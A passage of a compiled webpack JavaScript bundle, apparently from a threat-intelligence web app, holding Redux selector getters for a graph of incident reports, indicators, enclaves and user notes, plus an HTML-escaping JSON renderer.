  var nesting = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : 0;
  var builder = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : '';

  var identation = nesting * threshold;
  if (isTerminalValue(blob)) {
    builder += '\n      <div\n        style="margin-left: ' + identation + 'px;">\n        ' + safelyParseContent(blob) + '\n      </div>\n    ';
  } else if (Array.isArray(blob)) {
    blob.forEach(function (entry) {
      builder += parseAndSanitizeJsonToHtml(entry, nesting + 1);
    });
  } else if ((typeof blob === 'undefined' ? 'undefined' : _typeof(blob)) === 'object') {
    for (var key in blob) {
      builder += '\n        <div style="color: #528bff; margin-left: ' + identation + 'px; font-weight: bold">\n          ' + safelyParseContent(key) + ':\n        </div>\n      ';
      builder += parseAndSanitizeJsonToHtml(blob[key], nesting + 1);
    }
  }
  return builder;
};

/***/ }),
/* 1332 */,
/* 1333 */,
/* 1334 */,
/* 1335 */,
/* 1336 */,
/* 1337 */,
/* 1338 */,
/* 1339 */,
/* 1340 */,
/* 1341 */,
/* 1342 */,
/* 1343 */,
/* 1344 */,
/* 1345 */,
/* 1346 */,
/* 1347 */,
/* 1348 */,
/* 1349 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return LOCATION_CHANGE; });


// TODO: This line is not needed? import { LOCATION_CHANGE } from 'react-router-redux'
var LOCATION_CHANGE = '@@router/LOCATION_CHANGE';

/***/ }),
/* 1350 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "graphs", function() { return graphs; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "hasUserSeenTimeRangeExplanation", function() { return hasUserSeenTimeRangeExplanation; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentGraphId", function() { return currentGraphId; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "rootReportId", function() { return rootReportId; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "notes", function() { return notes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "notesById", function() { return notesById; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentNodeIds", function() { return currentNodeIds; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "activeNote", function() { return activeNote; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "highlightedNode", function() { return highlightedNode; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "breadcrumbTrailRaw", function() { return breadcrumbTrailRaw; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentBreadcrumbId", function() { return currentBreadcrumbId; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "nodesWithAnnotations", function() { return nodesWithAnnotations; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "hoveredNodeId", function() { return hoveredNodeId; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "options", function() { return options; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getLabelType", function() { return getLabelType; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "explosionIds", function() { return explosionIds; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentGraph", function() { return currentGraph; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentGraphWithPositions", function() { return currentGraphWithPositions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentGraphFilters", function() { return currentGraphFilters; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentGraphFilterText", function() { return currentGraphFilterText; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "showLabels", function() { return showLabels; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentFilterStatus", function() { return currentFilterStatus; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "graphFiltersWithEnclaves", function() { return graphFiltersWithEnclaves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "graphTagFilters", function() { return graphTagFilters; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentDisplayGraph", function() { return currentDisplayGraph; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentDetailsGraph", function() { return currentDetailsGraph; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentGraphWithEnclaves", function() { return currentGraphWithEnclaves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentGraphData", function() { return currentGraphData; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentDetailsGraphData", function() { return currentDetailsGraphData; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "applicableFilters", function() { return applicableFilters; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "rootNode", function() { return rootNode; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "breadcrumbTrail", function() { return breadcrumbTrail; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "breadcrumbTrailEnriched", function() { return breadcrumbTrailEnriched; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentTimeExtent", function() { return currentTimeExtent; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentNodeTimes", function() { return currentNodeTimes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentDailyHistogram", function() { return currentDailyHistogram; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentTimeRange", function() { return currentTimeRange; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentNodes", function() { return currentNodes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentNodeId", function() { return currentNodeId; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentNode", function() { return currentNode; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentDetailsNodes", function() { return currentDetailsNodes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentReport", function() { return currentReport; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentReportOrListItem", function() { return currentReportOrListItem; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentDecodedIndicatorReportId", function() { return currentDecodedIndicatorReportId; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "annotationNode", function() { return annotationNode; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentNoteSeq", function() { return currentNoteSeq; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "noteCount", function() { return noteCount; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "indicatorsInCurrentGraph", function() { return indicatorsInCurrentGraph; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_d3_array__ = __webpack_require__(103);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_d3_scale__ = __webpack_require__(218);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_date_fns__ = __webpack_require__(739);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_date_fns___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_date_fns__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_trustar_utils_utils_js__ = __webpack_require__(78);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_modules_reports_getters_js__ = __webpack_require__(215);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_modules_reports_utils_js__ = __webpack_require__(509);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_modules_indicators_getters_js__ = __webpack_require__(300);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_modules_enclave_getters_js__ = __webpack_require__(217);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_modules_summaries_getters_js__ = __webpack_require__(1384);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_modules_summaries_types_js__ = __webpack_require__(301);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_trustar_constellation_graph_utils_js__ = __webpack_require__(408);


















/**
 * NOTE:
 * It is important to remain cognizant of the fact that we deal in both node ids
 * and report ids within constellation. A node id is the id of a node within our
 * neo4j graph database, while a report id is the id of a report in our postgres
 * database. Nodes that represent incident reports also have a `initialId`
 * property that contains the report id.
 */

/* Updated Getters
 * ======================================================================= */
var graphs = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["getterFromKeyPath"])(['constellation', 'graphs']);

var hasUserSeenTimeRangeExplanation = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["getterFromKeyPath"])(['constellation', 'hasUserSeenTimeRangeExplanation']);

var currentGraphId = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["getterFromKeyPath"])(['constellation', 'currentGraphId']);

var rootReportId = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["getterFromKeyPath"])(['constellation', 'rootNodeId']);

var notes = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["getterFromKeyPath"])(['constellation', 'notes']);

var notesById = function notesById(id) {
  return Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(notes, function (notes) {
    return notes.get(id);
  });
};

/**
 * A Set containing all IDs of currently selected nodes
 */
var currentNodeIds = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["getterFromKeyPath"])(['constellationMeta', 'currentNodeIds']);

var activeNote = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["getterFromKeyPath"])(['constellationMeta', 'activeNote']);

/**
 * A node that is currently being highlighted
 */
var highlightedNode = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["getterFromKeyPath"])(['constellationMeta', 'highlightedNode']);

/**
 * A breadcrumb trail of previously visited nodes on the graph
 * Additional Selectors Further Down
 */
var breadcrumbTrailRaw = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["getterFromKeyPath"])(['constellationMeta', 'breadcrumbTrail']);
var currentBreadcrumbId = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["getterFromKeyPath"])(['constellationMeta', 'currentBreadcrumbId']);

/**
 * A Set containing the IDs of all nodes (graph nodes) that are currently known
 * to have annotations. We use this for determining a boolean for whether or not
 * a given node has nodes
 */
var nodesWithAnnotations = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(notes, function (notes) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Set"])(notes.keys());
});

var hoveredNodeId = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["getterFromKeyPath"])(['constellationMeta', 'hoveredNodeId']);

var options = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["getterFromKeyPath"])(['constellationMeta', 'options']);

var getLabelType = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(options, Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('labelType'));

var loading = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["getterFromKeyPath"])(['constellationMeta', 'loading']);

var explosionIds = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["getterFromKeyPath"])(['constellationMeta', 'explosionIds']);

/**
 * NOTE: Current graph will default to an empty graph if there is no
 * current graph. I.e. this will never resolve to a void value.
 */
var currentGraph = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([graphs, currentGraphId], function (graphs, id) {
  return graphs.get(id, Object(__WEBPACK_IMPORTED_MODULE_14_trustar_constellation_graph_utils_js__["Graph"])()).get('currentGraph');
});

/**
 * The current graph with positioning data merged in to the OrderedMap of nodes
 * for display purposes. The nodePositions comes from the d3 force simulation
 * and will be empty until the first graph is cached
 *
 * NOTE: an annotations array DOES come down the wire with each graph node. So,
 * we could just look for the existence of that array without doing any mapping
 * logic. However, that value is not reactive. We simply use it to populate the
 * notes store initially. But if a user adds a note to an otherwise unannotated
 * node then that state wouldn't change, but the `hasAnnotations` value will.
 */
var currentGraphWithPositions = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([graphs, currentGraphId, nodesWithAnnotations], function (graphs, id, annotatedNotes) {
  var graph = graphs.get(id, Object(__WEBPACK_IMPORTED_MODULE_14_trustar_constellation_graph_utils_js__["Graph"])());
  var currentGraph = graph.get('currentGraph');

  var _graph$get = graph.get('meta'),
      nodePositions = _graph$get.nodePositions;

  return currentGraph.mergeDeepIn(['data', 'nodes'], nodePositions).updateIn(['data', 'nodes'], function (nodes) {
    return nodes.map(function (x) {
      return x.set('hasAnnotations', annotatedNotes.has(x.get('id')));
    });
  } // See NOTE
  );
});

var currentGraphFilters = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(currentGraph, function (graph) {
  return graph.get('filters');
});

var currentGraphFilterText = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(currentGraphFilters, function (filters) {
  return filters.get('filterText');
});

var showLabels = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(options, Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('showLabels'));

var currentFilterStatus = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(currentGraph, function (graph) {
  return Object(__WEBPACK_IMPORTED_MODULE_14_trustar_constellation_graph_utils_js__["Filters"])().get('inactiveFilters').size - graph.getIn(['filters', 'inactiveFilters']).size > 0;
});

/**
 * NOTE: This was a quickly thrown together getter. It includes duplicate date
 * and merges two types of data only to have them separated in the component
 * that uses them. HIGHLY legacy. TODO: Refactor
 **/
var graphFiltersWithEnclaves = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([__WEBPACK_IMPORTED_MODULE_11_modules_enclave_getters_js__["enclavesMap"]], function (enc) {
  var enclaveFilters = enc.map(function (filter) {
    return {
      type: 'incident_report',
      enclaveId: filter.get('id'),
      iconUrl: filter.get('iconUrl'),
      label: filter.get('name'),
      name: filter.get('name'), // See NOTE
      color: filter.get('color')
    };
  });
  return __WEBPACK_IMPORTED_MODULE_14_trustar_constellation_graph_utils_js__["filterCategories"].merge(enclaveFilters);
});

var graphTagFilters = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([currentGraph, __WEBPACK_IMPORTED_MODULE_11_modules_enclave_getters_js__["enclavesMap"]], function (graph, enclaves) {
  return graph.getIn(['data', 'nodes']).filter(function (node) {
    return node.get('type') === 'INDICATOR_TAG';
  }).map(function (tag) {
    var color = enclaves.getIn([tag.get('enclaveId'), 'color'], 'yellow');
    return tag.set('color', color);
  });
});

/**
 * The current display graph. I.e. the graph with all nodes filtered or removed
 * by the user taken out.
 *
 * NOTE: This getter seems to be a bottleneck. We may need to refactor.
 */
var currentDisplayGraph = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(currentGraphWithPositions, function (graph) {
  var inactiveFilters = graph.getIn(['filters', 'inactiveFilters']);
  return Object(__WEBPACK_IMPORTED_MODULE_14_trustar_constellation_graph_utils_js__["removeNodes"])(Object(__WEBPACK_IMPORTED_MODULE_14_trustar_constellation_graph_utils_js__["filterNodesByTimeRange"])(graph, graph.get('timeRange')), graph.get('deletedNodes').merge(Object(__WEBPACK_IMPORTED_MODULE_14_trustar_constellation_graph_utils_js__["calculateFiltered"])(graph, inactiveFilters)));
});

var currentDetailsGraph = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(currentGraph, function (graph) {
  var inactiveFilters = graph.getIn(['filters', 'inactiveFilters']);
  return Object(__WEBPACK_IMPORTED_MODULE_14_trustar_constellation_graph_utils_js__["removeNodes"])(Object(__WEBPACK_IMPORTED_MODULE_14_trustar_constellation_graph_utils_js__["filterNodesByTimeRange"])(graph, graph.get('timeRange')), graph.get('deletedNodes').merge(Object(__WEBPACK_IMPORTED_MODULE_14_trustar_constellation_graph_utils_js__["calculateFiltered"])(graph, inactiveFilters)));
});

// Just some quick colors
var color = Object(__WEBPACK_IMPORTED_MODULE_4_d3_scale__["scaleOrdinal"])(['red', 'gree', 'blue', 'orange', 'yellow', 'gold', 'teal', 'maroon']);

/**
 * What the hell is this... amirite? We were getting some odd UI errors related
 * to mapping over undefined values when trying to display node enclaves. In
 * other words, although we couldnt' repro it seems likely that node.enclaves
 * was somehow set to an array of undefined. Thus the default value of enclave
 * placeholder was born \\\(۶•̀ᴗ•́)۶//／
 *
 * This just creats a plain object which can stand in for an enclave until the
 * enclaves are fully fetched.
 */
var createEnclavePlaceholder = function createEnclavePlaceholder(_ref) {
  var id = _ref.id;
  return {
    id: id,
    color: color(id)
  };
};

var currentGraphWithEnclaves = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([currentDisplayGraph, __WEBPACK_IMPORTED_MODULE_11_modules_enclave_getters_js__["enclavesMap"]], function (graph, enc) {
  return graph.updateIn(['data', 'nodes'], function (nodes) {
    return nodes.map(function (node) {
      return node.update(function (x) {
        var enclaveIds = x.get('enclaveGuids');
        var enclaves = enclaveIds ? enclaveIds.map(function (id) {
          return enc.get(id, createEnclavePlaceholder({ id: id }));
        }) : null;
        return x.set('enclaves', enclaves);
      });
    });
  });
});

/**
 * The graph display data (i.e. { nodes, edges }) to be displayed to the user.
 */
var currentGraphData = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(currentDisplayGraph, Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('data'));

var currentDetailsGraphData = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(currentDetailsGraph, Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('data'));

/* This shows us the filters that are applicable to a graph and the number of nodes
 * present per filter type (or system if node has system)
 */
var applicableFilters = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(currentGraph, function (graph) {
  var filteredByTimeAndDeleted = Object(__WEBPACK_IMPORTED_MODULE_14_trustar_constellation_graph_utils_js__["removeNodes"])(Object(__WEBPACK_IMPORTED_MODULE_14_trustar_constellation_graph_utils_js__["filterNodesByTimeRange"])(graph, graph.get('timeRange')), graph.get('deletedNodes'));
  return filteredByTimeAndDeleted.getIn(['data', 'nodes']).reduce(function (graphFilters, n) {

    var type = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["toLower"])(n.get('type'));
    var enclaveGuids = n.get('enclaveGuids');
    var tagNode = type === 'indicator_tag';
    var reportNode = type === 'incident_report';

    if (reportNode && enclaveGuids) {
      var enclaves = enclaveGuids.toMap().mapKeys(function (k, v) {
        return v;
      }).map(function (guid) {
        return graphFilters.get(guid, 0) + 1;
      });
      return graphFilters.merge(enclaves);
    } else if (!tagNode) {
      return graphFilters.update(type, 0, function (count) {
        return count + 1;
      });
    } else {
      return graphFilters;
    }
  }, Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])());
});

/**
 *
 * More Breadcrumbs
 */
var rootNode = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([currentGraphData, rootReportId], function (constellation, rootNodeId) {
  if (constellation) {
    var nodes = constellation.get('nodes', Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])());
    var _rootNode = nodes.get(rootNodeId);
    return _rootNode;
  }

  return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])();
});
var breadcrumbTrail = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([breadcrumbTrailRaw], function (breadcrumbTrail) {

  return breadcrumbTrail;
});

var enrichBreadcrumb = function enrichBreadcrumb(breadcrumb, summary) {
  if (!summary || summary.get('reportId') !== breadcrumb.get('id')) return breadcrumb;

  var closedSourceName = summary && summary.getIn(['source', 'name'], null);

  return closedSourceName ? breadcrumb.set('source', closedSourceName) : breadcrumb;
};

/**
 * Add Closed Source Data to breadcrumbs (i.e. Source)
 */
var breadcrumbTrailEnriched = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([breadcrumbTrail, __WEBPACK_IMPORTED_MODULE_12_modules_summaries_getters_js__["summary"]], function (breadcrumbTrail, summary) {

  return breadcrumbTrail.map(function (breadcrumb) {
    return enrichBreadcrumb(breadcrumb, summary);
  });
});

/**
 * NOTE: extent and range are both [number,number]. The difference is that the
 * range will be equal to or a subset of the full extnet. This getter is for the
 * full extent, i.e. the oldest and newest timestamps of nodes in this graph.
 */
var currentTimeExtent = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(currentGraph, function (graph) {

  var nodes = graph.getIn(['data', 'nodes']);
  return Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["pipe"])(__WEBPACK_IMPORTED_MODULE_14_trustar_constellation_graph_utils_js__["getNodeTimes"], __WEBPACK_IMPORTED_MODULE_2_d3_array__["extent"])(nodes);
});

var currentNodeTimes = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(currentGraph, Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["pipe"])(function (x) {
  return x.getIn(['data', 'nodes']);
}, __WEBPACK_IMPORTED_MODULE_14_trustar_constellation_graph_utils_js__["getNodeTimes"]));

var currentDailyHistogram = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(currentGraph, Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["pipe"])(function (x) {
  return x.getIn(['data', 'nodes']);
}, __WEBPACK_IMPORTED_MODULE_14_trustar_constellation_graph_utils_js__["getNodeTimes"], Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["groupBy"])(function (x) {
  return Object(__WEBPACK_IMPORTED_MODULE_5_date_fns__["format"])(x, 'YYYY-MM-DD');
}), Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["map"])(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('length'))));

/**
 * The current time range is different than extent in that it is a display
 * property, not a direct property of the data. It represents the time range
 * currently being displayed in the graph, so it will be equal to or a subset of
 * the time extent (getter above this one).
 */
var currentTimeRange = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(currentGraph, Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('timeRange'));

/* Old Getters
 * ======================================================================= */

/* TODO: Refactor below
 *
 * Some of these are still necessary but others have been refactored into the
 * graph getters above.
 * ======================================================================= */

/**
 * A Map of all currently selected node ids to their node Maps
 */
var currentNodes = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([currentNodeIds, currentGraphData], function (ids, constellation) {
  return ids.toMap().filter(function (_, k) {
    return constellation.getIn(['nodes', k]);
  }) // Basically we want a filter-map of ids to their nodes if they exist
  .map(function (_, k) {
    return constellation.getIn(['nodes', k]);
  });
});

/**
 * The id of the currently selected node. Can be null. Will also be null if more
 * than one node is selected.
 */
var currentNodeId = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(currentNodeIds, function (nodes) {
  if (!nodes || nodes.size !== 1) return null;
  return nodes.first();
});

/**
 * Same as above but for the actual node
 */
var currentNode = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(currentNodes, function (nodes) {
  if (!nodes || nodes.size !== 1) return null;
  return nodes.first();
});

var currentDetailsNodes = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([currentNodeIds, currentDetailsGraphData], function (ids, constellation) {
  return ids.toMap().filter(function (_, k) {
    return constellation.getIn(['nodes', k]);
  }) // Basically we want a filter-map of ids to their nodes if they exist
  .map(function (_, k) {
    return constellation.getIn(['nodes', k]);
  });
});

var currentReport = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([currentNodeIds, __WEBPACK_IMPORTED_MODULE_8_modules_reports_getters_js__["reports"]], function (ids, reports) {
  return reports.getIn([ids.first(), 'data']);
});

/**
 * This is convoluted and could likely be refactored. Here's the logic:
 *
 * The id is equal to the currently selected node id (selection.first()) or the
 * current id in the URL bar. This is important because if there is no
 * constellation we still want to show the report the user has clicked.
 *
 * Once we have that id (which can be null) we try to grab that report from
 * first the list of reports and then the list of search items (reportList),
 * some of which are report pointers.
 * This whole process can return undefined which indicates that the report has
 * not yet been fetched.
 *
 * UPDATE: We now check the current constellation for nodes as well. The reason
 * for this: If there is a report without a constellation then we need to still
 * grab the ID in the url. However, if there is a constellation the current
 * selection will default to the report id so we don't need to worry about
 * constellation.
 */

var currentReportOrListItem = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([currentGraphData, __WEBPACK_IMPORTED_MODULE_8_modules_reports_getters_js__["reports"], __WEBPACK_IMPORTED_MODULE_8_modules_reports_getters_js__["reportList"], currentNodeIds, __WEBPACK_IMPORTED_MODULE_8_modules_reports_getters_js__["currentReportId"]], function (constellation, reports, reportList, ids, currentReportId) {

  var hasNodes = Boolean(constellation.get('nodes').size);

  var report = Object(__WEBPACK_IMPORTED_MODULE_9_modules_reports_utils_js__["findReportInState"])(currentReportId, reports, reportList);

  if (report.isEmpty() && hasNodes) {
    return Object(__WEBPACK_IMPORTED_MODULE_9_modules_reports_utils_js__["findReportInState"])(ids.first(), reports, reportList);
  }

  return report;
});

var currentDecodedIndicatorReportId = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([__WEBPACK_IMPORTED_MODULE_8_modules_reports_getters_js__["currentReportId"]], function (currentReportId) {
  var decodedId = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["decodeIndicatorId"])(currentReportId).foldOr(function (err) {
    console.error('Could not decode ID - "' + currentReportId + '". This is probably normal. We call fromBase64 on everything, even malformed ids');
    return '';
  });
  return decodedId;
});

/**
 * NOTE: This logic mapping is fairly ugly.
 *
 * The issue this solves is that sometimes a report or other entity does not
 * have any correlation, so there are no "nodes" to annotate. However, we do
 * allow annotating individual entities so we want the user to be able to create
 * notes even if there are no correlations. By ensuring that node will be
 * defined and initialId is present we can accomplish this.
 */
var annotationNode = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([currentNodes, currentReportOrListItem], function (nodes, fallback) {
  var node = nodes.first() || fallback;

  if (!node.get('initialId')) {
    node = node.set('initialId', node.get('id'));
  }

  return node;
});

var currentNoteSeq = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])([notes, annotationNode], function (notes, node) {
  return notes.get(node.get('initialId'), Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])()).valueSeq().sort(Object(__WEBPACK_IMPORTED_MODULE_7_trustar_utils_utils_js__["sortBy"])('created', 'DESC'));
});

var noteCount = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(currentNoteSeq, function (seq) {
  return seq.count();
});

var indicatorsInCurrentGraph = Object(__WEBPACK_IMPORTED_MODULE_0_reselect__["createSelector"])(currentGraphData, function (constellation) {
  return constellation.get('nodes').filter(function (node) {
    return node.get('nodeType') === 'INDICATOR';
  });
});

/***/ }),
/* 1351 */,
/* 1352 */,
/* 1353 */,
/* 1354 */,
/* 1355 */,
/* 1356 */,
/* 1357 */,
/* 1358 */,
/* 1359 */,
/* 1360 */,
/* 1361 */,
/* 1362 */,
/* 1363 */,
/* 1364 */,
/* 1365 */,
/* 1366 */,
/* 1367 */,
/* 1368 */,
/* 1369 */,
/* 1370 */,
/* 1371 */,
/* 1372 */,
/* 1373 */,
/* 1374 */,
/* 1375 */,
/* 1376 */,
/* 1377 */,
/* 1378 */,
/* 1379 */,
/* 1380 */,
/* 1381 */,
/* 1382 */,
/* 1383 */,
/* 1384 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "summary", function() { return summary; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "summaries", function() { return summaries; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "description", function() { return description; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "attributes", function() { return attributes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "hasSummary", function() { return hasSummary; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "summaryFullyExpanded", function() { return summaryFullyExpanded; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "enclaveClosedSourceMapping", function() { return enclaveClosedSourceMapping; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "closedSourceEnclaveMapSet", function() { return closedSourceEnclaveMapSet; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getSummary", function() { return getSummary; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
